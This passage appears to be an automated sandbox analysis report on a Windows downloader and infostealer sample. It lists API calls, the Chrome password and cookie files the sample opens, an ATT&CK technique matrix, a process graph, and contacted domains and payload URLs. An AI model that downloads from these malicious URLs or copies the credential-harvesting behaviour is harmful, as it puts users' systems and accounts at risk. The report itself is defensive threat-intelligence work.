Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoA,_strncpy,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: _strlen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoW,WideCharToMultiByte,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: _strlen,_strlen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoA,MultiByteToWideChar,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,_strcat,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: _strlen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoA,_xtoa_s@20,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: GetLocaleInfoA,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\SibClr.dll VolumeInformation
Source: C:\Users\user\Desktop\h1GodtbhC8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E674FB1 GetSystemTimeAsFileTime,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E677DBD _free,GetTimeZoneInformation,_free,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E6294C0 LoadLibraryW,GetLastError,GetProcAddress,GetLastError,FreeLibrary,CorBindToRuntimeEx,FreeLibrary,FreeLibrary,FreeLibrary,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Replication Through Removable Media1Native API1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools11OS Credential Dumping1System Time Discovery12Replication Through Removable Media1Archive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsCommand and Scripting Interpreter3Create Account1Access Token Manipulation1Deobfuscate/Decode Files or Information1Input Capture11Peripheral Device Discovery11Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Browser Extensions1Process Injection12Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Local System1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Bootkit1Logon Script (Mac)Install Root Certificate2NTDSSystem Information Discovery58Distributed Component Object ModelInput Capture11Scheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing13LSA SecretsQuery Registry2SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsSecurity Software Discovery471VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncVirtualization/Sandbox Evasion14Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading2Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion14/etc/passwd and /etc/shadowRemote System Discovery11Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingSystem Network Configuration Discovery2Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection12Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
Compromise Software Supply ChainUnix ShellLaunchdLaunchdBootkit1KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 327203 Sample: h1GodtbhC8.exe Startdate: 05/12/2020 Architecture: WINDOWS Score: 100 60 dream.pics 2->60 62 www.sodown.xyz 2->62 64 30 other IPs or domains 2->64 80 Multi AV Scanner detection for domain / URL 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 Antivirus detection for URL or domain 2->84 86 14 other signatures 2->86 11 h1GodtbhC8.exe 1 26 2->11         started        14 msiexec.exe 2->14         started        signatures3 process4 file5 52 C:\Users\user\AppData\Local\...\Sibuia.dll, PE32 11->52 dropped 54 C:\Users\user\AppData\...\h1GodtbhC8.exe.log, ASCII 11->54 dropped 56 C:\Users\user\AppData\Local\...\SibClr.dll, PE32 11->56 dropped 58 2 other files (none is malicious) 11->58 dropped 16 setup.exe 5 11->16         started        process6 file7 48 C:\Program Files (x86)\...\aliens.exe, PE32 16->48 dropped 19 aliens.exe 1 2 16->19         started        process8 dnsIp9 66 EF6DF4AF06BA6896.xyz 104.28.4.129, 49734, 49738, 49740 CLOUDFLARENETUS United States 19->66 68 ef6df4af06ba6896.xyz 19->68 50 C:\Users\user\...\1E1C360C582DF797.exe, PE32 19->50 dropped 88 Installs new ROOT certificates 19->88 90 Hides threads from debuggers 19->90 24 1E1C360C582DF797.exe 2 29 19->24         started        28 cmd.exe 19->28         started        30 1E1C360C582DF797.exe 1 15 19->30         started        32 msiexec.exe 4 19->32         started        file10 signatures11 process12 dnsIp13 70 1c5491a87d65f1ef.club 172.67.142.39, 443, 49739 CLOUDFLARENETUS United States 24->70 72 192.168.2.1 unknown unknown 24->72 78 2 other IPs or domains 24->78 92 Detected unpacking (creates a PE file in dynamic memory) 24->92 94 Machine Learning detection for dropped file 24->94 96 Tries to harvest and steal browser information (history, passwords, etc) 24->96 98 Contains functionality to detect sleep reduction / modifications 24->98 34 1607186572092.exe 24->34         started        36 1607186588295.exe 24->36         started        38 ThunderFW.exe 24->38         started        74 127.0.0.1 unknown unknown 28->74 100 Uses ping.exe to sleep 28->100 40 conhost.exe 28->40         started        42 PING.EXE 28->42         started        76 ef6df4af06ba6896.xyz 30->76 44 cmd.exe 30->44         started        signatures14 process15 process16 46 conhost.exe 44->46         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
h1GodtbhC8.exe46%VirustotalBrowse
h1GodtbhC8.exe19%MetadefenderBrowse
h1GodtbhC8.exe64%ReversingLabsWin32.Downloader.Upatre
h1GodtbhC8.exe100%AviraHEUR/AGEN.1139239
h1GodtbhC8.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe100%Joe Sandbox ML
C:\Program Files (x86)\71eza90awf48\aliens.exe100%Joe Sandbox ML
C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dll17%ReversingLabsWin32.PUA.SilentInstallBuilder

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
25.2.1E1C360C582DF797.exe.4330000.4.unpack100%AviraTR/Patched.Ren.Gen2Download File
0.0.h1GodtbhC8.exe.400000.0.unpack100%AviraHEUR/AGEN.1139321Download File
21.2.1E1C360C582DF797.exe.42a0000.6.unpack100%AviraTR/Patched.Ren.Gen2Download File
4.2.aliens.exe.42c0000.4.unpack100%AviraTR/Patched.Ren.Gen2Download File
0.2.h1GodtbhC8.exe.400000.0.unpack100%AviraHEUR/AGEN.1139321Download File

Domains

SourceDetectionScannerLabelLink
ef6df4af06ba6896.xyz5%VirustotalBrowse
dream.pics10%VirustotalBrowse
EF6DF4AF06BA6896.xyz5%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://1C5491A87D65F1EF.club/Info_t/upycfa0%Avira URL Cloudsafe
https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info.0%Avira URL Cloudsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://EF6DF4AF06BA6896.xyz/info/du0%Avira URL Cloudsafe
http://dream.pics/setup_10.2_mix1.exe/silentHKEY_CURRENT_USERSoftware0%Avira URL Cloudsafe
http://EF6DF4AF06BA6896.xyz/00%Avira URL Cloudsafe
http://ef6df4af06ba6896.xyz/info/w0%Avira URL Cloudsafe
http://EF6DF4AF06BA6896.xyz//0%Avira URL Cloudsafe
http://dream.pics/setup_10.2_mix1.exe0%Avira URL Cloudsafe
https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
http://EF6DF4AF06BA6896.xyz/;0%Avira URL Cloudsafe
https://1C5491A87D65F1EF.club/Info_t/upData0%Avira URL Cloudsafe
https://twitter.comsec-fetch-dest:0%Avira URL Cloudsafe
https://www.instagram.comsec-fetch-mode:0%Avira URL Cloudsafe
http://ef6df4af06ba6896.xyz/info/du:0%Avira URL Cloudsafe
http://EF6DF4AF06BA6896.xyz/info/wlub0%Avira URL Cloudsafe
http://dream.pics/setup_10.2_mix1.exeimet0%Avira URL Cloudsafe
http://www.youtube.com_70%Avira URL Cloudsafe
https://twitter.comReferer:0%Avira URL Cloudsafe
http://www.interestvideo.com/video1.php0%Avira URL Cloudsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
http://dream.pics/setup_10.2_mix1.exe6b_x0%Avira URL Cloudsafe
http://ef6df4af06ba6896.xyz/0%Avira URL Cloudsafe
https://.twitter.com/s0%Avira URL Cloudsafe
http://ef6df4af06ba6896.xyz/info/du.0%Avira URL Cloudsafe
http://crt.com0%Avira URL Cloudsafe
http://EF6DF4AF06BA6896.xyz/info/ddd0%Avira URL Cloudsafe
https://sectigo.com/CPS00%URL Reputationsafe
https://sectigo.com/CPS00%URL Reputationsafe
https://sectigo.com/CPS00%URL Reputationsafe
http://EF6DF4AF06BA6896.xyz/dbo0%Avira URL Cloudsafe
http://www.sodown.xyz/index.exe100%Avira URL Cloudmalware
https://1C5491A87D65F1EF.club/0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://ef6df4af06ba6896.xyz/info/g0%Avira URL Cloudsafe
http://ef6df4af06ba6896.xyz/info/e0%Avira URL Cloudsafe
http://EF6DF4AF06BA6896.xyz/info/r0%Avira URL Cloudsafe
https://1C5491A87D65F1EF.club/Info_t/up0%Avira URL Cloudsafe
http://crl.usertrust.0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://EF6DF4AF06BA6896.xyz/info/dddi_u0%Avira URL Cloudsafe
http://ocsp.usertrus0%Avira URL Cloudsafe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:0%Avira URL Cloudsafe
http://www.sodown.xyz/in0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ef6df4af06ba6896.xyz
104.28.4.129
truefalseunknown
cnchubstat.sandai.net
140.206.225.136
truefalse
    		high
    bgphub5u.sandai.net
    		39.98.57.143
    		truefalse
      		high
      iplogger.org
      		88.99.66.31
      		truefalse
        		high
        dream.pics
        		8.208.85.95
        		truetrueunknown
        bgphub5pr.sandai.net
        		47.92.39.6
        		truefalse
          		high
          EF6DF4AF06BA6896.xyz
          		104.28.4.129
          		truefalseunknown
          1c5491a87d65f1ef.club
          		172.67.142.39
          		truefalse
            		unknown
            cnc.hub5pnc.sandai.net
            		47.92.99.221
            		truefalse
              		high
              www.sodown.xyz
              		104.18.63.67
              		truefalse
                		unknown
                cnc.hub5pn.sandai.net
                		153.3.232.174
                		truefalse
                  		high
                  cncidx.m.hub.sandai.net
                  		112.64.218.64
                  		truefalse
                    		high
                    pmap.sandai.net
                    		47.97.7.140
                    		truefalse
                      		high
                      hub5c.hz.sandai.net
                      		unknown
                      		unknownfalse
                        		high
                        hub5idx.shub.hz.sandai.net
                        		unknown
                        		unknownfalse
                          		high
                          hub5u.hz.sandai.net
                          		unknown
                          		unknownfalse
                            		high
                            hub5sr.shub.hz.sandai.net
                            		unknown
                            		unknownfalse
                              		high
                              score.phub.hz.sandai.net
                              		unknown
                              		unknownfalse
                                		high
                                hubstat.hz.sandai.net
                                		unknown
                                		unknownfalse
                                  		high
                                  pmap.hz.sandai.net
                                  		unknown
                                  		unknownfalse
                                    		high
                                    hub5pr.hz.sandai.net
                                    		unknown
                                    		unknownfalse
                                      		high
                                      hub5pn.hz.sandai.net
                                      		unknown
                                      		unknownfalse
                                        		high
                                        imhub5pr.hz.sandai.net
                                        		unknown
                                        		unknownfalse
                                          		high
                                          hub5pnc.hz.sandai.net
                                          		unknown
                                          		unknownfalse
                                            		high
                                            relay.phub.hz.sandai.net
                                            		unknown
                                            		unknownfalse
                                              		high

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://ef6df4af06ba6896.xyz/info/wfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://EF6DF4AF06BA6896.xyz/info/dddfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://ef6df4af06ba6896.xyz/info/dufalse
                                                		unknown
                                                http://ef6df4af06ba6896.xyz/info/gfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://ef6df4af06ba6896.xyz/info/efalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://ef6df4af06ba6896.xyz/info/rfalse
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://1C5491A87D65F1EF.club/Info_t/upycfa1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://duckduckgo.com/chrome_newtab1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info.1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    https://duckduckgo.com/ac/?q=1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://ocsp.sectigo.com0h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://EF6DF4AF06BA6896.xyz/info/du1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.messenger.com/1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://dream.pics/setup_10.2_mix1.exe/silentHKEY_CURRENT_USERSoftware1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://EF6DF4AF06BA6896.xyz/01E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://EF6DF4AF06BA6896.xyz//1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.nirsoft.net1607186572092.exe, 0000001C.00000002.546643482.0000000000198000.00000004.00000010.sdmp, 1607186588295.exe, 0000001D.00000002.580802111.0000000000198000.00000004.00000010.sdmpfalse
                                                            		high
                                                            http://EF6DF4AF06BA6896.xyz/info/w1E1C360C582DF797.exe, 00000015.00000003.574995047.0000000005D4C000.00000004.00000001.sdmpfalse
                                                              		unknown
                                                              http://dream.pics/setup_10.2_mix1.exe1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp, 1E1C360C582DF797.exe, 00000015.00000003.655265366.00000000026C0000.00000040.00000001.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_h1GodtbhC8.exe, 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp, Sibuia.dll.0.drfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://nsis.sf.net/NSIS_Error...aliens.exe, 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.825159947.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000019.00000000.617074635.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe.4.drfalse
                                                                		high
                                                                http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://EF6DF4AF06BA6896.xyz/;1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://twitter.com/ookie:1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://curl.haxx.se/docs/http-cookies.html1E1C360C582DF797.exe, 00000015.00000002.831435598.0000000004FD1000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.656349419.0000000005230000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://1C5491A87D65F1EF.club/Info_t/upData1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://twitter.comsec-fetch-dest:1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://iplogger.org/14Zhe71E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      https://www.instagram.comsec-fetch-mode:1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.instagram.com/accounts/login/ajax/facebook/1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://ef6df4af06ba6896.xyz/info/du:1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.instagram.com/sec-fetch-site:1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://EF6DF4AF06BA6896.xyz/info/wlub1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://dream.pics/setup_10.2_mix1.exeimet1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.youtube.com_71E1C360C582DF797.exe, 00000019.00000003.642482203.0000000005C32000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		low
                                                                          https://twitter.comReferer:1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.interestvideo.com/video1.php1E1C360C582DF797.exe, 00000019.00000002.656349419.0000000005230000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://sectigo.com/CPS0Dh1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://dream.pics/setup_10.2_mix1.exe6b_x1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://ef6df4af06ba6896.xyz/1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.messenger.com1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://www.instagram.com/accept:1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://.twitter.com/s1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		low
                                                                              https://www.messenger.com/login/nonce/1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.nirsoft.net/1607186572092.exe, 0000001C.00000002.546755980.000000000040F000.00000002.00020000.sdmp, 1607186588295.exe, 0000001D.00000002.580846767.000000000040F000.00000002.00020000.sdmpfalse
                                                                                  		high
                                                                                  http://ef6df4af06ba6896.xyz/info/du.1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://crt.com1E1C360C582DF797.exe, 00000015.00000003.582940046.0000000005D48000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%21E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://sectigo.com/CPS0h1GodtbhC8.exefalse
